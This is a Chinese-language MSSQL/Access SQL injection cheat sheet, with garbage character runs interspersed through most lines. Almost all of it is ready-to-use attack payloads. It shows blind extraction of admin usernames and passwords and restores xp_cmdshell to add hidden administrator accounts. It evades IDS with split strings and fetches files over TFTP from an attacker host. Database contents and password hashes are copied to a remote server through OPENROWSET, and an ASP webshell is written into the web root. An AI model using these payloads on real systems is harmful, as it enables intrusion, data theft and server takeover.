1..判断有无注入点
2 Q, K! ]" G/ i; and 1=1 and 1=2
6 o1 F+ P5 f* X1 Y7 G0 y1 P q# ]$ Y; X4 N5 J
( Y q% K+ }& i/ T6 a U2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 0 C6 n! r+ j/ |" Y. J
and 0<>(select count(*) from *)
6 ?2 J" Z: _* g3 }; fand 0<>(select count(*) from admin) ---判断是否存在admin这张表 3 I3 B* B+ W* v/ y m: _/ F* A7 X
" l% ?. ^- L6 A3 w4 h
" ~) s% `; w; c$ M9 K" h* M# v3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 ; X. \1 z, O2 F
and 0<(select count(*) from admin)
# s& k7 v8 W! K& o" O* f, Y0 Qand 1<(select count(*) from admin)
# P) T; x3 u8 ?5 q$ [猜列名还有 and (select count(列名) from 表名)>0% @2 I. X5 ?& J9 F8 m7 ~
: F- e* ]' F' z' P7 W7 E6 W
( n& }+ t: p3 S \) a8 s" S4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
# k: H: }! L: Xand 1=(select count(*) from admin where len(*)>0)-- S0 L2 b% R' E: q4 d
and 1=(select count(*) from admin where len(用户字段名称name)>0)
2 y( g4 ~/ f( }" t) p- B! a3 kand 1=(select count(*) from admin where len(密码字段名称password)>0)
% S0 P; J3 R& V- h" {; O! O
s% P; _" E. F! Z5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
/ T, `. Z; `; A- V3 i1 ^9 eand 1=(select count(*) from admin where len(*)>0) 5 p+ T, o# R& W! o2 D ~& f% @* f5 Z
and 1=(select count(*) from admin where len(name)>6) 错误 - b" l2 m$ Q. d. ]+ z
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 . k9 j/ `& c5 Z* Z% C9 S4 g
and 1=(select count(*) from admin where len(name)=6) 正确
8 Z0 t; o& ?" q/ s: ]
/ Q& ^6 i% k* N" u, Hand 1=(select count(*) from admin where len(password)>11) 正确 ; Q" K, `. e* X( v
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
; E# i9 C" E1 V0 g' }5 Xand 1=(select count(*) from admin where len(password)=12) 正确
! s3 _, x7 Z) l% S8 F猜长度还有 and (select top 1 len(username) from admin)>5; Z& e% q+ l6 J4 |
# @' j$ _. W9 |; l: W
1 Y7 g* K, [% G8 r/ n( o3 X) z* `6.猜解字符
( u/ I$ T# P% Zand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
0 w1 T/ `0 j/ [2 u& K3 I. \' n8 o4 gand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
0 B* N! w, q4 U# l5 j2 M就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 ) v/ g" W0 L3 ]. [0 d. B" z" _
( Y& E& M$ i8 j H3 i# x+ J9 D猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算1 H3 X/ e0 ~1 g- N0 p
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
* g+ z1 F* ]8 z$ h3 r) \' ~$ ~这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
2 q/ p# C+ {" A) E }* c# N' n$ ^) G: V* w3 I9 g
group by users.id having 1=1-- ' u$ c2 J& @/ V: v, _6 `" a
group by users.id, users.username, users.password, users.privs having 1=1--
[( z- ]) j( C3 V7 Q1 R4 S% m( \; insert into users values( 666, attacker, foobar, 0xffff )-- + H" n3 f& Q% x! H2 r I
, V, p! `0 B/ z# K# j# @7 W
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- $ ~* G: ?1 ^$ e0 p; `
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- L+ C( B. ` _9 g- w, M" e
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
5 P! S0 b! h% W$ O3 @UNION SELECT TOP 1 login_name FROM logintable-
! Q: g# J8 e1 g2 G/ e* i0 GUNION SELECT TOP 1 password FROM logintable where login_name=Rahul-- & e" C% |2 I' D* |/ G0 ^: H
* ^, \ g6 Q1 f6 o
看服务器打的补丁=出错了打了SP4补丁
" i# G6 L2 Y0 x6 N* pand 1=(select @@VERSION)-- ' {& z$ j K! t; @/ o
9 e( U# z$ x. a7 f& `2 L) o
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 ) L& O* z+ c& F
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
) Y9 [. ~, a/ d; c( Q% o
2 Q. M* w8 g; L判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
+ z8 @6 N0 E. x0 J7 @and sa=(SELECT System_user)-- ! q" s# S# X8 s
and user_name()=dbo-- / D2 Z. J1 \8 d6 W# N
and 0<>(select user_name()--
* c, o7 B! o+ s: h2 ^7 ^8 I7 B: E9 d0 O' l
看xp_cmdshell是否删除 . b8 C4 X: \1 E8 v* K4 |
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
' L1 U1 U1 E/ P9 C6 X
7 {& w+ ~2 S6 r2 Rxp_cmdshell被删除,恢复,支持绝对路径的恢复 / C1 a: d, N' y
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- 0 U7 x8 H0 b5 v; h# W! R8 e
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- 0 {8 m6 G6 j: M5 U% c% v
V; y6 X/ z1 ]" w反向PING自己实验
}/ N4 o6 e+ A( e;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
3 S. i+ D6 s4 @
+ S7 \! L1 y$ w/ e! E J加帐号 : o* i# j6 A6 C: }6 q3 }2 I6 }6 {
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
z5 c' p- V. X2 @! H8 Y. ]* l4 ^
5 A# d' W5 @4 l8 |创建一个虚拟目录E盘:
+ u8 x9 `% E. Q$ Q;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- - l" T: N Q9 m- ?: e+ ?
6 m7 x9 y# D5 o7 @- n6 H9 L% I
访问属性:(配合写入一个webshell) 8 C5 Y2 J/ Y7 M$ w6 C
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
- C. h/ i- w7 O: B4 z' V/ @, z" X/ D4 e7 m& R( {$ O( n
1 C9 ]% K" H j) p' LMSSQL也可以用联合查询1 p- G" a5 D X s* x* s' l
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin ' r+ \: o" g* \4 n. }' q2 d
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) ! s" {7 X" ^1 p( B% H2 h* L' t1 O
" P6 K& N* R0 O( k4 o' r5 X) s% `- k% h: i% }2 W% {1 u* d+ [, e8 R
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
6 S/ e# F5 O- d0 x& }' @& p7 w
" {4 G- d, u, p+ J# {9 N
% u; j$ e, g( T2 ?( W, F7 w( Q9 ?% H! q5 D
得到WEB路径 ' W+ m0 k F0 Z+ {
;create table [dbo].[swap] ([swappass][char](255));-- * O" P) D9 s5 I3 h6 Z( z
and (select top 1 swappass from swap)=1--
( ]( T' F0 [& B/ y;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
, G- }# J7 \# l2 V! O- V;use ku1;-- " L' V2 Q U* X* Z9 c7 I$ w1 V
;create table cmd (str image);-- 建立image类型的表cmd 5 g& i1 k6 `" h! ?' R( H' a
; |% Y1 D6 B* ~1 [, Z9 Q/ n5 s3 H& N
存在xp_cmdshell的测试过程: 4 g, ?6 j2 U1 `1 D
;exec master..xp_cmdshell dir
1 ?2 }; R: Z/ P" E+ p;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 / u( p" ~; T6 Q& i# _9 N7 b5 I( D
;exec master.dbo.sp_password null,jiaoniang$,1866574;-- ' W B, K7 S! p1 w1 P5 V
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
* z0 o6 ^/ Z3 N+ ~9 U0 q;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- 8 G# d& D8 s6 h& y M4 Y: R* E
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
$ B p5 p* _. rexec master..xp_servicecontrol start, schedule 启动服务
( g1 x# T" o9 w9 {exec master..xp_servicecontrol start, server
# b; m0 h2 Q" v* W9 k: L, }+ y( X; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add : i, j: F, O. \6 v# [- J8 i& J( P
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add / l# ?* r( ] d( t7 p% t
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
# M% K+ C7 v9 Y# K$ W% A# D5 z! R; q+ B' U, U
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
' @6 O3 R7 X& Q;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ . W& Y9 Q0 J' o. R' L" Q
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat , R8 [! ]: X t9 S4 f8 V- j
如果被限制则可以。
4 Y. Z: R2 s# I1 qselect * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
5 s! `* q& u. t) p: U% c1 E4 g0 i: P7 N1 C/ w; G! L
查询构造:
! F4 z( B: X7 p3 PSELECT * FROM news WHERE id=... AND topic=... AND ..... J- {% C) R7 E8 W |9 o
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
, ~! T( b# f: `: @3 m8 M7 g9 vselect 123;--
+ B* [7 u( z t, C;use master;--
9 q% B6 n4 r8 o& ~# } }% l:a or name like fff%;-- 显示有一个叫ffff的用户哈。
" W. g6 E* }7 G* d2 }3 ]5 @. nand 1<>(select count(email) from [user]);--
0 d" `2 R: \( m3 |) Q/ L;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- 4 p. r! q- q8 H j3 `
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- ) x6 f3 m7 {7 q! `* f
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- + e8 M8 Z2 Q5 V- W2 ?% t
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
9 R: n( ?9 c$ `) b o' {; ];update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- 9 ~/ m* N& @# I2 D
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
4 {+ I# h4 E4 D% b3 y3 S上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
" l3 L! U. s: B2 w' O通过查看ffff的用户资料可得第一个用表叫ad $ S! y( Q0 D& P7 t; ~- p4 N
然后根据表名ad得到这个表的ID 得到第二个表的名字
# o4 f, u/ E( e6 S; j! z/ |2 S
( Z' g( d$ Z$ E2 d/ R+ I) P( hinsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- & |" w; D) W# g* k. v8 h6 }6 [/ I
insert into users values( 667,123,123,0xffff)-- : x, X+ s3 P2 g9 G/ [' Z: X
insert into users values ( 123, admin--, password, 0xffff)--
+ l. F6 C3 R$ j;and user>0 ; Y- K( K, z! ?4 s$ A+ J' _
;and (select count(*) from sysobjects)>0 - n/ C2 q) P* X5 [
;and (select count(*) from mysysobjects)>0 //为access数据库 1 m& z' X7 l1 u' ~2 D
0 e: |4 u' C, Z" x, I9 S7 K枚举出数据表名 & U1 l" d1 m. ~, ?) }
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
1 l, x' x0 E, w; q6 ~; X这是将第一个表名更新到aaa的字段处。
8 _3 d& q" Y8 s) Q6 b& n读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 / @+ D' z7 |( h0 c" L5 @5 l7 W, ~
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- % e1 \( G5 z. P3 f7 u
然后id=1552 and exists(select * from aaa where aaa>5)
5 h! M( I6 Y3 [" q/ c' `: a9 \读出第二个表,一个个的读出,直到没有为止。 8 n" Q, E- t8 }" c! Q9 {
读字段是这样: 0 h, i8 {% a7 k1 w. Z( I. T8 ^
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- 6 j8 M, G% C% t6 o
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
, B4 S: _* N: T;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- 7 a4 O: s+ {$ v2 j8 @' {( ] g, Z1 D
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 0 t+ g! Z6 {* P+ S' A% c
5 M$ _' {$ ~9 b+ k8 a
[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
) L3 p* s: B4 x* Mupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) " S( n& @/ a. \. f
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
& C* D, E4 _ O/ ]! l
' ~$ J5 Z6 g0 S" ^$ }& [9 {# ][获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
0 d/ D1 a; J; H6 w8 E- z% wupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]
; j* V. n3 B1 ~7 e/ O
- k& d$ }( o6 J% h. d, U* _绕过IDS的检测[使用变量]
9 u' L( W. ]/ L& z;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
/ T3 H' [4 [* T- g. S# Z5 E;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
6 f& I \3 ~* @- k/ K" {) y: G- D
1、 开启远程数据库 & V$ R8 s) u8 \" Q6 b6 Q# k9 s
基本语法
+ p# g D* ]; B' N/ H" rselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) : W5 ?) W8 u8 A4 A4 X- [
参数: (1) OLEDB Provider name $ z' \: @- i4 r2 Z
2、 其中连接字符串参数可以是任何端口用来连接,比如 # D7 V ?" X; d& _, s2 r0 g( x6 K; f
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
' `) c4 S4 H* d" y0 w3 ^3.复制目标主机的整个数据库insert所有远程表到本地表。 : R6 J% {* C& g4 g& N I9 J
/ Y6 X0 A! T& V: N# q- J3 ~2 P基本语法: : @- W6 `8 q( ]# d6 R
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
0 M. O( m7 k6 L" d6 R这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: % F" z8 p' v% f% G6 Z) b
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 + D5 y, }) _( |* T
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) p5 P5 \0 \) j* l! ?/ @
select * from master.dbo.sysdatabases
* s1 a8 ~: A% Y1 {0 q) B( Kinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
5 s; t, Q6 [! hselect * from user_database.dbo.sysobjects & e" i- Y: k0 Y0 ~! z5 n2 o; G
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
1 M& a) x/ s) Q* y- T# _# o* Q. Pselect * from user_database.dbo.syscolumns 4 f" _( N4 Z+ B+ u
复制数据库:
?0 _ B! [; \ A8 M' N4 rinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 # s R3 \; b/ \$ F0 V- l( i ?
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
0 W( Z7 Q, e: B, P& s( r& N. S" T I+ B8 j
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
* X* j l+ K3 v+ d7 x! m7 t6 t# X4 P9 [insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins 8 k; X t* D6 L% V5 @
得到hash之后,就可以进行暴力破解。 8 o A( r- ^0 E& C+ d
9 {! g! }; r0 m+ p
遍历目录的方法: 先创建一个临时表:temp
0 Y! K5 K O8 C8 N" v;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 6 a5 M# t4 D, o5 x- {
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
+ N, l& q% O; G0 ^;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 a9 |, i1 U0 R R) P/ v9 O2 t
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
" a U8 f J! l# u" r1 j;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 ' L a) L7 N, p8 \
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
* }) S" l. b/ I# }9 e* R* ?. P;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
3 g F. ~- G( X3 q! j8 R3 F8 a;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc 3 F* i: X$ }" t$ T0 _1 }( B! S
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) 1 \/ A3 E- Q) L; V# e4 g
写入表:
6 O- U' H/ W/ i+ F( g6 W" ^6 q语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
% f) V# I' f: m1 X- ~# `2 y语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
$ V2 y, K) o0 t% a/ Z0 Y! C. S0 {语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
/ J# i4 K8 y. E8 t6 ?. ?! ]; ~语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- % p$ q A: h, }: P1 j7 _2 c$ _
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 0 e7 `% r- u. o+ X9 `
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- 6 y- t! E2 l- h: z( K5 N7 M& i
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- " s/ }" h$ A, ?* y% l( z
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- 7 F, u' t$ R8 f0 o9 C& L G
语句9:and 1=(SELECT IS_MEMBER(db_owner));-- 8 i. I! H0 @# g+ J+ T9 R
: J. i) a# r! u3 {2 f) n% N! X" r把路径写到表中去:
8 p2 Q, D0 N9 s9 P8 [9 e$ R;create table dirs(paths varchar(100), id int)--
$ B4 ?9 m% B# N# [9 L+ ]* `;insert dirs exec master.dbo.xp_dirtree c:\--
" R2 O2 q% h5 f) p c+ X* N$ gand 0<>(select top 1 paths from dirs)-- # T9 V% W8 m( H1 M8 A
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
/ G) ]) v& V G. m% Y a;create table dirs1(paths varchar(100), id int)-- 8 W& @/ t7 O( s3 \' i; G
;insert dirs exec master.dbo.xp_dirtree e:\web-- / P2 }" z$ C( [8 U1 ?; H8 ^# _
and 0<>(select top 1 paths from dirs1)-- ; t# s- W1 K% V* C9 [ d
* a% `1 J/ u" R6 H" ~把数据库备份到网页目录:下载 : k" b3 @, |- o: A1 T( e4 i0 n
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
5 d3 c0 y" ]* J5 x5 e3 B# P3 ^* N& I9 c3 B( q$ b: U
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) 6 q j7 [: w. }8 u. ]
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
, N, H5 L* U+ X. [9 [, hand 1=(select user_id from USER_LOGIN) " ^. y; j& F' [9 t! b
and 0=(select user from USER_LOGIN where user>1) * c& y% O# B1 Q' u2 J8 X
' f8 Q( } g" x7 S2 b. @-=- wscript.shell example -=-
5 _! O' h7 `+ f/ F' t% z. c4 Adeclare @o int
4 M* }, U( j* J5 Eexec sp_oacreate wscript.shell, @o out * a) z7 e8 C* O- A9 R0 K
exec sp_oamethod @o, run, NULL, notepad.exe
- g3 O9 e! s: F2 Y; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
1 x, ` Y' [0 o+ v' j! J' x b' f9 L( y8 d! W9 Y
declare @o int, @f int, @t int, @ret int
j- Q% Z1 s- w8 P+ X" x% udeclare @line varchar(8000) ( B3 e3 \0 a" t3 A" j
exec sp_oacreate scripting.filesystemobject, @o out
% C; _( |' a( ~/ y& q5 V; H: H- Jexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 & d$ y% C/ N8 W- T/ [
exec @ret = sp_oamethod @f, readline, @line out * y; n5 ]/ `; W1 y1 b
while( @ret = 0 )
. Y9 [9 B, V4 q7 zbegin
9 V4 q6 Z4 v9 l/ |6 g$ v% N6 cprint @line
$ O3 w6 K3 X* _( f3 |/ g! d3 V3 t I" \. jexec @ret = sp_oamethod @f, readline, @line out 6 v% G5 b6 r; \ G% f( q
end 4 j" P0 h$ C' i& y1 g
) Y2 R8 s8 ^5 [declare @o int, @f int, @t int, @ret int
1 q+ l# D2 b6 R- P3 ]' m0 Y$ sexec sp_oacreate scripting.filesystemobject, @o out - N' x- f$ q& y3 @9 G
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 " x6 ~- B' o* c+ g# \
exec @ret = sp_oamethod @f, writeline, NULL, # @& a1 C0 [" [; N/ Y0 j, v5 n
<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
- u# _- R5 z3 q) R: S) P/ ^! ]- H+ N4 t' ~1 `5 @2 s
declare @o int, @ret int & ?4 q1 T) ?/ F, z: A, G" p9 P
exec sp_oacreate speech.voicetext, @o out
+ O# c; }4 d, qexec sp_oamethod @o, register, NULL, foo, bar
% t& s: s: m7 ^6 P$ p- J. Pexec sp_oasetproperty @o, speed, 150 ) b0 ^" g; e2 s/ r
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
; G% c( w b" o# }0 m) W, Cwaitfor delay 00:00:05
' n i) _, C/ {( c. {7 T
2 a, i: V4 T2 z- q; S; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- , G/ B. p3 _! g( N, L
" s# N' p! C1 @5 N% c
xp_dirtree适用权限PUBLIC
+ Y$ J& H9 P+ Lexec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 # y- ~( ^6 \8 h, `& H7 O7 e) A2 v
create table dirs(paths varchar(100), id int)
! w8 \' d: N5 L$ X建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
% O8 E' H# a3 Z; kinsert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
. U+ W2 S+ p5 ]% w- ~& R& ]: r |